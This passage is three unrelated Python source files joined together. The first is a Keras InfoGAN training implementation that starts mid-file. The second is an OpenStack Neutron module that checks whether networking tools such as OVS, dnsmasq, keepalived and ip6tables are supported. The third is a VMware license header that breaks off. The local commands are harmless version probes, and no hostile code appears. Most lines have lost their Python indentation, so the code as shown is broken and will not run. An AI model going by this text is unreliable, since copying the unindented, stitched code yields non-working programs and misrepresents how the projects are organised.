disc_train_losses = merge_dicts(disc_losses, enc_losses)
self.disc_train_model.compile(optimizer=Adam(lr=2e-4, beta_1=0.2),
loss=disc_train_losses)
# GENERATOR TRAINING MODEL
self.generator.unfreeze()
self.shared_net.freeze()
self.discriminator.freeze()
self.encoder.freeze()
gen_losses, G_loss_outputs = self.generator.get_loss(self.disc_gen)
gen_losses = merge_dicts(gen_losses, mi_losses)
self.gen_train_model = K_Model(inputs=self.prior_param_inputs,
outputs=G_loss_outputs + E_gen_loss_outputs,
name="gen_train_model")
self.gen_train_model.compile(optimizer=Adam(lr=1e-3, beta_1=0.2),
loss=gen_losses)
# FOR DEBUGGING
self.sample_debug = K.function(inputs=[K.learning_phase()] + self.prior_param_inputs,
outputs=[self.sampled_latents['c1']])
self.gen_and_predict = K.function(inputs=[K.learning_phase()] + self.prior_param_inputs,
outputs=[G_loss_outputs[0], self.generated])
self.disc_predict = K.function(inputs=[K.learning_phase(), self.real_input],
outputs=[D_loss_outputs[0]])
def sanity_check(self):
"""_sanity_check
Checks that the gen_train_model uses the same discriminator weights
as in the disc_model.
"""
prior_params = self.prior.assemble_prior_params()
gen_score, samples = self.gen_and_predict([0] + prior_params)
# disc_score1 = self.disc_model.predict(samples)
disc_score2 = self.disc_predict([0, samples])
# assert np.all(np.isclose(gen_score, disc_score1, atol=1.e-2))
assert np.all(np.equal(gen_score, disc_score2))
print("Passed")
def _train_disc_pass(self, samples_batch, labels_batch=None):
dummy_targets = [np.ones((self.batch_size, ) + self.shape_prefix + (1, ), dtype=np.float32)] * \
len(self.disc_train_model.outputs)
inputs = [samples_batch]
if labels_batch is None and self.encoder.supervised_dist:
            supervised = self.encoder.supervised_dist
            dim = self.encoder.meaningful_dists[supervised].sample_size()
labels_batch = np.zeros((self.batch_size,) + self.shape_prefix + (dim, ))
if self.encoder.supervised_dist:
inputs += [labels_batch]
prior_params = self.prior.assemble_prior_params()
return self.disc_train_model.train_on_batch(inputs + prior_params,
dummy_targets)
def _train_gen_pass(self):
dummy_targets = [np.ones((self.batch_size, ) + self.shape_prefix + (1, ), dtype=np.float32)] * \
len(self.gen_train_model.outputs)
prior_params = self.prior.assemble_prior_params()
return self.gen_train_model.train_on_batch(prior_params,
dummy_targets)
def train_on_minibatch(self, samples, labels=None):
disc_losses = self._train_disc_pass(samples, labels)
gen_losses = self._train_gen_pass()
loss_logs = dict(zip(self.gen_train_model.metrics_names, gen_losses))
loss_logs = merge_dicts(loss_logs,
dict(zip(self.disc_train_model.metrics_names, disc_losses)))
return {'losses': loss_logs}
def load_weights(self, gen_weights_filepath, disc_weights_filepath):
self.disc_train_model.load_weights(disc_weights_filepath)
self.gen_train_model.load_weights(gen_weights_filepath)
class InfoganPriorImpl(InfoganPrior):
def __init__(self,
meaningful_dists,
noise_dists,
prior_params,
recurrent_dim):
super(InfoganPriorImpl, self).__init__(meaningful_dists,
noise_dists, prior_params, recurrent_dim)
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
def sample(self):
samples = {}
prior_param_inputs = []
for name, dist in self.noise_dists.items():
sample, param_inputs = self._sample_latent(name, dist)
samples[name] = sample
prior_param_inputs += param_inputs
for name, dist in self.meaningful_dists.items():
sample, param_inputs = self._sample_latent(name, dist)
samples[name] = sample
prior_param_inputs += param_inputs
return samples, prior_param_inputs
def _sample_latent(self, dist_name, dist):
param_names = []
param_inputs = []
param_dims = []
for param_name, (dim, _) in dist.param_info().items():
param_input = Input(shape=self.shape_prefix + (dim, ),
name="g_input_{}_{}".format(dist_name, param_name))
param_inputs.append(param_input)
param_dims.append(dim)
param_names.append(param_name)
def sampling_fn(merged_params):
param_dict = {}
i = 0
for param_name, dim in zip(param_names, param_dims):
if self.recurrent_dim:
param = merged_params[:, :, i:i + dim]
else:
param = merged_params[:, i:i + dim]
param_dict[param_name] = param
i += dim
sample = dist.sample(param_dict)
return sample
if len(param_inputs) > 1:
merged_params = Concatenate(axis=-1,
name="g_params_{}".format(dist_name))(param_inputs)
else:
merged_params = param_inputs[0]
sample = Lambda(function=sampling_fn,
name="g_sample_{}".format(dist_name),
output_shape=self.shape_prefix + (dist.sample_size(), ))(merged_params)
return sample, param_inputs
def assemble_prior_params(self):
params = []
for dist_name, dist in self.noise_dists.items():
for param_name in dist.param_info():
params.append(self.prior_params[dist_name][param_name])
for dist_name, dist in self.meaningful_dists.items():
for param_name in dist.param_info():
params.append(self.prior_params[dist_name][param_name])
return params
class InfoganGeneratorImpl(InfoganGenerator):
def __init__(self,
data_shape,
meaningful_dists,
noise_dists,
data_q_dist,
network,
recurrent_dim):
super(InfoganGeneratorImpl, self).__init__(data_shape,
meaningful_dists, noise_dists, data_q_dist,
network, recurrent_dim)
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
def generate(self, prior_samples):
"""
generate - applies the generator to a dictionary of samples from the different
salient and noise distributions to generate a sample from p_G(x)
:param prior_samples: dict, keys are dist. names, values are sampled keras tensors
"""
sampled_latents_flat = list(prior_samples.values())
merged_samples = Concatenate(axis=-1, name="g_concat_prior_samples")(sampled_latents_flat)
generation_params = self.network.apply(inputs=merged_samples)
generated = Lambda(function=self._sample_data,
output_shape=self.shape_prefix + self.data_shape,
name="g_x_sampling")(generation_params)
return generated
def _sample_data(self, params):
params_dict = {}
i = 0
for param_name, (param_dim, param_activ) in self.data_q_dist.param_info().items():
if self.recurrent_dim:
param = params[:, :, i:i + param_dim]
else:
param = params[:, i:i + param_dim]
params_dict[param_name] = param_activ(param)
sampled_data = self.data_q_dist.sample(params_dict)
if self.recurrent_dim:
sampled_data = sampled_data[:, :, 0]
else:
sampled_data = sampled_data[:, 0]
return sampled_data
def get_loss(self, disc_gen_output):
# add a dummy activation layer, just to be able to name it properly
loss_layer_name = "G_gen_loss"
gen_output = Activation(activation=linear, name=loss_layer_name)(disc_gen_output)
def gen_loss(targets, preds):
            # NOTE: targets are ignored because these are generated samples
return -K.log(preds + K.epsilon())
return {loss_layer_name: gen_loss}, [gen_output]
def freeze(self):
self.network.freeze()
def unfreeze(self):
self.network.unfreeze()
class InfoganDiscriminatorImpl(InfoganDiscriminator):
def __init__(self,
network):
super(InfoganDiscriminatorImpl, self).__init__(network)
def discriminate(self, samples):
preactiv = self.network.apply(samples)
output = Activation(activation=K.sigmoid)(preactiv)
return output
def get_loss(self, disc_real_output, disc_gen_output):
loss_real_name = "D_real_loss"
loss_gen_name = "D_gen_loss"
real_output = Activation(activation=linear, name=loss_real_name)(disc_real_output)
gen_output = Activation(activation=linear, name=loss_gen_name)(disc_gen_output)
def disc_real_loss(targets, real_preds):
            # NOTE: targets are ignored because these are real samples
return -K.log(real_preds + K.epsilon()) / 2.0
def disc_gen_loss(targets, gen_preds):
            # NOTE: targets are ignored because these are generated samples
return -K.log(1 - gen_preds + K.epsilon()) / 2.0
return {loss_real_name: disc_real_loss, loss_gen_name: disc_gen_loss}, \
[real_output, gen_output]
def freeze(self):
self.network.freeze()
def unfreeze(self):
self.network.unfreeze()
class InfoganEncoderImpl(InfoganEncoder):
def __init__(self,
batch_size,
meaningful_dists,
supervised_dist,
network,
recurrent_dim):
super(InfoganEncoderImpl, self).__init__(batch_size,
meaningful_dists, supervised_dist,
network, recurrent_dim)
if self.recurrent_dim:
self.shape_prefix = (self.recurrent_dim, )
else:
self.shape_prefix = ()
# Define meaningful dist output layers
self.dist_output_layers = {}
for dist_name, dist in self.meaningful_dists.items():
info = dist.param_info()
self.dist_output_layers[dist_name] = {}
for param, (dim, activation) in info.items():
preact = Dense(dim, name="e_dense_{}_{}".format(dist_name, param))
if self.recurrent_dim:
preact = TimeDistributed(preact, name="e_time_{}_{}".format(dist_name, param))
act = Activation(activation, name="e_activ_{}_{}".format(dist_name, param))
self.dist_output_layers[dist_name][param] = [preact, act]
# define an ordering of params for each dist
self.orderings = {}
for dist_name, dist in self.meaningful_dists.items():
self.orderings[dist_name] = list()
for param_name, (dim, _) in dist.param_info().items():
self.orderings[dist_name].append((param_name, dim))
def encode(self, samples):
enc_preact = self.network.apply(samples)
encodings = self._add_enc_outputs(enc_preact)
return encodings
def _add_enc_outputs(self, enc_preact):
posterior_outputs = {}
for dist_name, dist in self.meaningful_dists.items():
param_outputs_dict = self._make_enc_outputs(dist_name, dist, enc_preact)
posterior_outputs[dist_name] = param_outputs_dict
return posterior_outputs
def _make_enc_outputs(self, dist_name, dist, layer):
outputs = {}
for param, param_layers in self.dist_output_layers[dist_name].items():
out = layer
for param_layer in param_layers:
out = param_layer(out)
outputs[param] = out
return outputs
def _make_loss_output(self, dist_name, param_outputs_dict):
param_outputs_list = []
for param_name, _ in self.orderings[dist_name]:
param_outputs_list.append(param_outputs_dict[param_name])
if len(param_outputs_list) > 1:
merged_params = Concatenate(axis=-1)(param_outputs_list)
else:
merged_params = param_outputs_list[0]
return merged_params
def get_mi_loss(self, sampled_latents, gen_encodings):
loss_outputs = []
mi_losses = {}
for dist_name, dist in self.meaningful_dists.items():
param_outputs_dict = gen_encodings[dist_name]
loss_output_name = "E_mi_loss_{}".format(dist_name)
loss_output = self._make_loss_output(dist_name, param_outputs_dict)
loss_output = Activation(activation=linear,
name=loss_output_name)(loss_output)
loss_outputs.append(loss_output)
mi_loss = self._build_loss(sampled_latents[dist_name], dist, self.orderings[dist_name])
mi_losses[loss_output_name] = mi_loss
return mi_losses, loss_outputs
def _build_loss(self, samples, dist, param_infos):
def enc_loss(dummy, param_outputs):
param_dict = {}
param_index = 0
for param_name, dim in param_infos:
if self.recurrent_dim:
param = param_outputs[:, :, param_index:param_index + dim]
else:
param = param_outputs[:, param_index:param_index + dim]
param_dict[param_name] = param
param_index += dim
loss = dist.nll(samples, param_dict)
return loss
return enc_loss
def get_supervised_loss(self, real_labels, real_encodings):
if not self.supervised_dist:
return {}, []
dist = self.meaningful_dists[self.supervised_dist]
param_outputs_dict = real_encodings[self.supervised_dist]
loss = self._build_loss(real_labels, dist,
self.orderings[self.supervised_dist])
# since some real instances might not have a label, I assume that
# this is indicated by all labels in the batch being set to 0 everywhere
# (which is never the case for discrete labels, and almost impossible for
# continuous labels)
        def wrapped_loss(targets, preds):
            labels_missing = K.all(K.equal(targets, K.zeros_like(targets)))
            return K.switch(labels_missing,
                            K.zeros((self.batch_size, ) + self.shape_prefix + (1, )),
                            loss(targets, preds))
loss_output_name = "E_supervised_loss_{}".format(self.supervised_dist)
loss_output = self._make_loss_output(self.supervised_dist, param_outputs_dict)
loss_output = Activation(activation=linear,
name=loss_output_name)(loss_output)
return {loss_output_name: wrapped_loss}, [loss_output]
def get_labels_input(self):
if not self.supervised_dist:
return None
dim = self.meaningful_dists[self.supervised_dist].sample_size()
return Input(shape=self.shape_prefix + (dim, ), name="labels_input")
def freeze(self):
for param_layers_dict in self.dist_output_layers.values():
for param_layers in param_layers_dict.values():
for layer in param_layers:
layer.trainable = False
self.network.freeze()
def unfreeze(self):
for param_layers_dict in self.dist_output_layers.values():
for param_layers in param_layers_dict.values():
for layer in param_layers:
layer.trainable = True
self.network.unfreeze()
def merge_dicts(x, y):
z = x.copy()
z.update(y)
return z
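# NOTE(editor): tiny illustration, not part of the library. It demonstrates two
# conventions used above: merge_dicts() combines the per-output loss
# dictionaries fed to Keras, and the training models receive all-ones dummy
# targets because every loss function above ignores its "targets" argument.
# The loss names below are placeholders.
def _example_loss_dict_and_dummy_targets(batch_size=4):
    disc_losses = {"D_real_loss": "binary_crossentropy",
                   "D_gen_loss": "binary_crossentropy"}
    enc_losses = {"E_mi_loss_c1": "mse"}
    combined = merge_dicts(disc_losses, enc_losses)
    dummy_targets = [np.ones((batch_size, 1), dtype=np.float32)] * len(combined)
    return combined, dummy_targets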
|
|
# Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import distutils
import enum
import re
import shutil
import tempfile
import netaddr
from neutron_lib import constants as n_consts
from neutron_lib import exceptions
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from oslo_utils import versionutils
from neutron.agent.common import ovs_lib
from neutron.agent.l3 import ha_router
from neutron.agent.l3 import namespaces
from neutron.agent.linux import external_process
from neutron.agent.linux import ip_lib
from neutron.agent.linux import keepalived
from neutron.agent.linux import utils as agent_utils
from neutron.common import utils as common_utils
from neutron.conf.agent.l3 import config as l3_config
from neutron.plugins.ml2.drivers.openvswitch.agent.common \
import constants as ovs_const
from neutron.privileged.agent.linux import dhcp as priv_dhcp
LOG = logging.getLogger(__name__)
MINIMUM_DNSMASQ_VERSION = '2.67'
DNSMASQ_VERSION_DHCP_RELEASE6 = '2.76'
DNSMASQ_VERSION_HOST_ADDR6_LIST = '2.81'
DIRECT_PORT_QOS_MIN_OVS_VERSION = '2.11'
MINIMUM_DIBBLER_VERSION = '1.0.1'
CONNTRACK_GRE_MODULE = 'nf_conntrack_proto_gre'
OVN_NB_DB_SCHEMA_PORT_GROUP = '5.11'
OVN_NB_DB_SCHEMA_STATELESS_NAT = '5.17'
OVN_SB_DB_SCHEMA_VIRTUAL_PORT = '2.5'
class OVNCheckType(enum.Enum):
nb_version = 0
nb_db_schema = 1
sb_version = 2
sb_db_schema = 3
def _get_ovn_version(check_type):
if check_type in (OVNCheckType.nb_version, OVNCheckType.nb_db_schema):
cmd = ['ovn-nbctl', '--version']
    elif check_type in (OVNCheckType.sb_version, OVNCheckType.sb_db_schema):
cmd = ['ovn-sbctl', '--version']
else:
raise RuntimeError
out = agent_utils.execute(cmd)
if check_type == OVNCheckType.nb_version:
matched_line = re.search(r"ovn-nbctl.*", out)
elif check_type == OVNCheckType.sb_version:
matched_line = re.search(r"ovn-sbctl.*", out)
else:
matched_line = re.search(r"DB Schema.*", out)
matched_version = re.search(r"(\d+\.\d+)", matched_line.group(0))
return versionutils.convert_version_to_tuple(matched_version.group(1) if
matched_version else '0.0')
def ovs_vxlan_supported(from_ip='192.0.2.1', to_ip='192.0.2.2'):
br_name = common_utils.get_rand_device_name(prefix='vxlantest-')
port_name = common_utils.get_rand_device_name(prefix='vxlantest-')
with ovs_lib.OVSBridge(br_name) as br:
port = br.add_tunnel_port(
port_name=port_name,
remote_ip=from_ip,
local_ip=to_ip,
tunnel_type=n_consts.TYPE_VXLAN)
return port != ovs_lib.INVALID_OFPORT
def ovs_geneve_supported(from_ip='192.0.2.3', to_ip='192.0.2.4'):
br_name = common_utils.get_rand_device_name(prefix='genevetest-')
port_name = common_utils.get_rand_device_name(prefix='genevetest-')
with ovs_lib.OVSBridge(br_name) as br:
port = br.add_tunnel_port(
port_name=port_name,
remote_ip=from_ip,
local_ip=to_ip,
tunnel_type=n_consts.TYPE_GENEVE)
return port != ovs_lib.INVALID_OFPORT
def iproute2_vxlan_supported():
ip = ip_lib.IPWrapper()
name_dummy = common_utils.get_rand_device_name(prefix='vxlantest-')
ip.add_dummy(name_dummy)
name = common_utils.get_rand_device_name(prefix='vxlantest-')
port = ip.add_vxlan(name, 3000, name_dummy)
ip.del_veth(name)
return name == port.name
def patch_supported():
name, peer_name, patch_name = common_utils.get_related_rand_device_names(
['patchtest-', 'peertest0-', 'peertest1-'])
with ovs_lib.OVSBridge(name) as br:
port = br.add_patch_port(patch_name, peer_name)
return port != ovs_lib.INVALID_OFPORT
def nova_notify_supported():
try:
# pylint:disable=import-outside-toplevel
import neutron.notifiers.nova # noqa since unused
return True
except ImportError:
return False
def ofctl_arg_supported(cmd, **kwargs):
"""Verify if ovs-ofctl binary supports cmd with **kwargs.
:param cmd: ovs-ofctl command to use for test.
:param **kwargs: arguments to test with the command.
:returns: a boolean if the supplied arguments are supported.
"""
br_name = common_utils.get_rand_device_name(prefix='br-test-')
with ovs_lib.OVSBridge(br_name) as test_br:
full_args = ["ovs-ofctl", cmd, test_br.br_name,
ovs_lib._build_flow_expr_str(kwargs, cmd.split('-')[0],
False)]
try:
agent_utils.execute(full_args, run_as_root=True,
privsep_exec=True)
except RuntimeError as e:
LOG.debug("Exception while checking supported feature via "
"command %s. Exception: %s", full_args, e)
return False
except Exception:
LOG.exception("Unexpected exception while checking supported"
" feature via command: %s", full_args)
return False
else:
return True
def arp_responder_supported():
mac = netaddr.EUI('dead:1234:beef', dialect=netaddr.mac_unix)
ip = netaddr.IPAddress('240.0.0.1')
actions = ovs_const.ARP_RESPONDER_ACTIONS % {'mac': mac, 'ip': ip}
return ofctl_arg_supported(cmd='add-flow',
table=21,
priority=1,
proto='arp',
dl_vlan=42,
nw_dst='%s' % ip,
actions=actions)
def arp_header_match_supported():
return ofctl_arg_supported(cmd='add-flow',
table=24,
priority=1,
proto='arp',
arp_op='0x2',
arp_spa='1.1.1.1',
actions="NORMAL")
def icmpv6_header_match_supported():
return ofctl_arg_supported(cmd='add-flow',
table=ovs_const.ARP_SPOOF_TABLE,
priority=1,
dl_type=n_consts.ETHERTYPE_IPV6,
nw_proto=n_consts.PROTO_NUM_IPV6_ICMP,
icmp_type=n_consts.ICMPV6_TYPE_NA,
nd_target='fdf8:f53b:82e4::10',
actions="NORMAL")
def netns_read_requires_helper():
nsname = "netnsreadtest-" + uuidutils.generate_uuid()
ip_lib.create_network_namespace(nsname)
try:
# read without root_helper. if exists, not required.
exists = ip_lib.network_namespace_exists(nsname)
finally:
ip_lib.delete_network_namespace(nsname)
return not exists
def get_minimal_dnsmasq_version_supported():
return MINIMUM_DNSMASQ_VERSION
def get_dnsmasq_version_with_dhcp_release6():
return DNSMASQ_VERSION_DHCP_RELEASE6
def get_dnsmasq_version_with_host_addr6_list():
return DNSMASQ_VERSION_HOST_ADDR6_LIST
def get_ovs_version_for_qos_direct_port_support():
return DIRECT_PORT_QOS_MIN_OVS_VERSION
def dnsmasq_local_service_supported():
cmd = ['dnsmasq', '--test', '--local-service']
env = {'LC_ALL': 'C'}
obj, cmd = agent_utils.create_process(cmd, addl_env=env)
_stdout, _stderr = obj.communicate()
returncode = obj.returncode
if returncode == 127:
LOG.debug("Exception while checking dnsmasq version. "
"dnsmasq: No such file or directory")
return False
elif returncode == 1:
return False
return True
def dnsmasq_version_supported():
try:
cmd = ['dnsmasq', '--version']
env = {'LC_ALL': 'C'}
out = agent_utils.execute(cmd, addl_env=env)
m = re.search(r"version (\d+\.\d+)", out)
ver = distutils.version.StrictVersion(m.group(1) if m else '0.0')
if ver < distutils.version.StrictVersion(MINIMUM_DNSMASQ_VERSION):
return False
if (cfg.CONF.dnsmasq_enable_addr6_list is True and
ver < distutils.version.StrictVersion(
DNSMASQ_VERSION_HOST_ADDR6_LIST)):
LOG.warning('Support for multiple IPv6 addresses in host '
'entries was introduced in dnsmasq version '
'%(required)s. Found dnsmasq version %(current)s, '
'which does not support this feature. Unless support '
'for multiple IPv6 addresses was backported to the '
'running build of dnsmasq, the configuration option '
'dnsmasq_enable_addr6_list should be set to False.',
{'required': DNSMASQ_VERSION_HOST_ADDR6_LIST,
'current': ver})
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking minimal dnsmasq version. "
"Exception: %s", e)
return False
return True
def ovs_qos_direct_port_supported():
try:
cmd = ['ovs-vsctl', '-V']
out = agent_utils.execute(cmd)
matched_line = re.search(r"ovs-vsctl.*", out)
matched_version = re.search(r"(\d+\.\d+)", matched_line.group(0))
ver = versionutils.convert_version_to_tuple(matched_version.group(1) if
matched_version else '0.0')
minver = versionutils.convert_version_to_tuple(
DIRECT_PORT_QOS_MIN_OVS_VERSION)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug("Exception while checking minimal ovs version "
"required for supporting direct ports QoS rules. "
"Exception: %s", e)
return False
return True
def dhcp_release6_supported():
return priv_dhcp.dhcp_release6_supported()
def bridge_firewalling_enabled():
for proto in ('arp', 'ip', 'ip6'):
knob = 'net.bridge.bridge-nf-call-%stables' % proto
cmd = ['sysctl', '-b', knob]
try:
out = agent_utils.execute(cmd)
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while extracting %(knob)s. "
"Exception: %(e)s", {'knob': knob, 'e': e})
return False
if out == '0':
return False
return True
class KeepalivedIPv6Test(object):
def __init__(self, ha_port, gw_port, gw_vip, default_gw):
l3_config.register_l3_agent_config_opts(l3_config.OPTS, cfg.CONF)
self.ha_port = ha_port
self.gw_port = gw_port
self.gw_vip = gw_vip
self.default_gw = default_gw
self.manager = None
self.config = None
self.config_path = None
self.nsname = "keepalivedtest-" + uuidutils.generate_uuid()
self.pm = None
self.orig_interval = cfg.CONF.AGENT.check_child_processes_interval
def configure(self):
config = keepalived.KeepalivedConf()
instance1 = keepalived.KeepalivedInstance('MASTER', self.ha_port, 1,
['169.254.192.0/18'],
advert_int=5)
instance1.track_interfaces.append(self.ha_port)
# Configure keepalived with an IPv6 address (gw_vip) on gw_port.
vip_addr1 = keepalived.KeepalivedVipAddress(self.gw_vip, self.gw_port)
instance1.vips.append(vip_addr1)
# Configure keepalived with an IPv6 default route on gw_port.
gateway_route = keepalived.KeepalivedVirtualRoute(n_consts.IPv6_ANY,
self.default_gw,
self.gw_port)
instance1.virtual_routes.gateway_routes = [gateway_route]
config.add_instance(instance1)
self.config = config
def start_keepalived_process(self):
# Disable process monitoring for Keepalived process.
cfg.CONF.set_override('check_child_processes_interval', 0, 'AGENT')
self.pm = external_process.ProcessMonitor(cfg.CONF, 'router')
# Create a temp directory to store keepalived configuration.
self.config_path = tempfile.mkdtemp()
# Instantiate keepalived manager with the IPv6 configuration.
self.manager = keepalived.KeepalivedManager(
'router1', self.config,
namespace=self.nsname, process_monitor=self.pm,
conf_path=self.config_path)
self.manager.spawn()
def verify_ipv6_address_assignment(self, gw_dev):
process = self.manager.get_process()
common_utils.wait_until_true(lambda: process.active)
def _gw_vip_assigned():
iface_ip = gw_dev.addr.list(ip_version=6, scope='global')
if iface_ip:
return self.gw_vip == iface_ip[0]['cidr']
common_utils.wait_until_true(_gw_vip_assigned)
def __enter__(self):
ip_lib.create_network_namespace(self.nsname)
return self
def __exit__(self, exc_type, exc_value, exc_tb):
if self.pm:
self.pm.stop()
if self.manager:
self.manager.disable()
if self.config_path:
shutil.rmtree(self.config_path, ignore_errors=True)
ip_lib.delete_network_namespace(self.nsname)
cfg.CONF.set_override('check_child_processes_interval',
self.orig_interval, 'AGENT')
def keepalived_ipv6_supported():
"""Check if keepalived supports IPv6 functionality.
Validation is done as follows.
1. Create a namespace.
2. Create OVS bridge with two ports (ha_port and gw_port)
3. Move the ovs ports to the namespace.
4. Spawn keepalived process inside the namespace with IPv6 configuration.
5. Verify if IPv6 address is assigned to gw_port.
6. Verify if IPv6 default route is configured by keepalived.
"""
br_name, ha_port, gw_port = common_utils.get_related_rand_device_names(
['ka-test-', ha_router.HA_DEV_PREFIX, namespaces.INTERNAL_DEV_PREFIX])
gw_vip = 'fdf8:f53b:82e4::10/64'
expected_default_gw = 'fe80:f816::1'
with ovs_lib.OVSBridge(br_name) as br:
with KeepalivedIPv6Test(ha_port, gw_port, gw_vip,
expected_default_gw) as ka:
br.add_port(ha_port, ('type', 'internal'))
br.add_port(gw_port, ('type', 'internal'))
ha_dev = ip_lib.IPDevice(ha_port)
gw_dev = ip_lib.IPDevice(gw_port)
ha_dev.link.set_netns(ka.nsname)
gw_dev.link.set_netns(ka.nsname)
ha_dev.link.set_up()
gw_dev.link.set_up()
ha_dev.addr.add('169.254.192.8/18')
ka.configure()
ka.start_keepalived_process()
ka.verify_ipv6_address_assignment(gw_dev)
default_gw = gw_dev.route.get_gateway(ip_version=6)
if default_gw:
default_gw = default_gw['via']
return expected_default_gw == default_gw
def ovsdb_native_supported():
# Running the test should ensure we are configured for OVSDB native
try:
ovs = ovs_lib.BaseOVS()
ovs.get_bridges()
return True
except ImportError as ex:
LOG.error("Failed to import required modules. Ensure that the "
"python-openvswitch package is installed. Error: %s",
ex)
except Exception:
LOG.exception("Unexpected exception occurred.")
return False
def ovs_conntrack_supported():
br_name = common_utils.get_rand_device_name(prefix="ovs-test-")
with ovs_lib.OVSBridge(br_name) as br:
try:
br.add_protocols(*["OpenFlow%d" % i for i in range(10, 15)])
except RuntimeError as e:
LOG.debug("Exception while checking ovs conntrack support: %s", e)
return False
return ofctl_arg_supported(cmd='add-flow', ct_state='+trk', actions='drop')
def ebtables_supported():
try:
cmd = ['ebtables', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed ebtables. "
"Exception: %s", e)
return False
def ipset_supported():
try:
cmd = ['ipset', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed ipset. "
"Exception: %s", e)
return False
def ip6tables_supported():
try:
cmd = ['ip6tables', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed ip6tables. "
"Exception: %s", e)
return False
def conntrack_supported():
try:
cmd = ['conntrack', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed conntrack. "
"Exception: %s", e)
return False
def get_minimal_dibbler_version_supported():
return MINIMUM_DIBBLER_VERSION
def dibbler_version_supported():
try:
cmd = ['dibbler-client',
'help']
out = agent_utils.execute(cmd)
return '-w' in out
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking minimal dibbler version. "
"Exception: %s", e)
return False
def _fix_ip_nonlocal_bind_root_value(original_value):
current_value = ip_lib.get_ip_nonlocal_bind(namespace=None)
if current_value != original_value:
ip_lib.set_ip_nonlocal_bind(value=original_value, namespace=None)
def ip_nonlocal_bind():
nsname1 = "ipnonlocalbind1-" + uuidutils.generate_uuid()
nsname2 = "ipnonlocalbind2-" + uuidutils.generate_uuid()
ip_lib.create_network_namespace(nsname1)
try:
ip_lib.create_network_namespace(nsname2)
try:
original_value = ip_lib.get_ip_nonlocal_bind(namespace=None)
try:
ip_lib.set_ip_nonlocal_bind(value=0, namespace=nsname1)
ip_lib.set_ip_nonlocal_bind(value=1, namespace=nsname2)
ns1_value = ip_lib.get_ip_nonlocal_bind(namespace=nsname1)
finally:
_fix_ip_nonlocal_bind_root_value(original_value)
except RuntimeError as e:
LOG.debug("Exception while checking ip_nonlocal_bind. "
"Exception: %s", e)
return False
finally:
ip_lib.delete_network_namespace(nsname2)
finally:
ip_lib.delete_network_namespace(nsname1)
return ns1_value == 0
def gre_conntrack_supported():
cmd = ['modinfo', CONNTRACK_GRE_MODULE]
try:
return agent_utils.execute(cmd, log_fail_as_error=False)
except exceptions.ProcessExecutionError:
return False
def min_tx_rate_support():
device_mappings = helpers.parse_mappings(
cfg.CONF.SRIOV_NIC.physical_device_mappings, unique_keys=False)
devices_to_test = set()
for devices_in_physnet in device_mappings.values():
for device in devices_in_physnet:
devices_to_test.add(device)
# NOTE(ralonsoh): the VF used by default is 0. Each SR-IOV configured
# NIC should have configured at least 1 VF.
VF_NUM = 0
devices_without_support = set()
for device in devices_to_test:
try:
ip_link = ip_lib.IpLinkCommand(device)
# NOTE(ralonsoh): to set min_tx_rate, first is needed to set
# max_tx_rate and max_tx_rate >= min_tx_rate.
vf_config = {'vf': VF_NUM, 'rate': {'min_tx_rate': int(400),
'max_tx_rate': int(500)}}
ip_link.set_vf_feature(vf_config)
vf_config = {'vf': VF_NUM, 'rate': {'min_tx_rate': 0,
'max_tx_rate': 0}}
ip_link.set_vf_feature(vf_config)
except ip_lib.InvalidArgument:
devices_without_support.add(device)
if devices_without_support:
LOG.debug('The following NICs do not support "min_tx_rate": %s',
devices_without_support)
return False
return True
def ovn_nb_db_schema_port_group_supported():
try:
ver = _get_ovn_version(OVNCheckType.nb_db_schema)
minver = versionutils.convert_version_to_tuple(
OVN_NB_DB_SCHEMA_PORT_GROUP)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug('Exception while checking OVN DB schema version. '
'Exception: %s', e)
return False
return True
def ovn_nb_db_schema_stateless_nat_supported():
try:
ver = _get_ovn_version(OVNCheckType.nb_db_schema)
minver = versionutils.convert_version_to_tuple(
OVN_NB_DB_SCHEMA_STATELESS_NAT)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug('Exception while checking OVN DB schema version. '
'Exception: %s', e)
return False
return True
def ovn_sb_db_schema_virtual_port_supported():
try:
ver = _get_ovn_version(OVNCheckType.sb_db_schema)
minver = versionutils.convert_version_to_tuple(
OVN_SB_DB_SCHEMA_VIRTUAL_PORT)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug('Exception while checking OVN DB schema version. '
'Exception: %s', e)
return False
return True
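# Illustrative sketch (not part of the original module): the probe functions
# above follow the same convention -- run a small command or namespace
# operation and map any failure to False -- so a caller can aggregate them
# into a single pre-flight report. The function names below exist in this
# module; the report structure itself is hypothetical.
#
#     def run_sanity_report():
#         checks = {
#             'ip6tables': ip6tables_supported,
#             'conntrack': conntrack_supported,
#             'dibbler': dibbler_version_supported,
#             'ip_nonlocal_bind': ip_nonlocal_bind,
#         }
#         return {name: bool(check()) for name, check in checks.items()}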
|
|
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
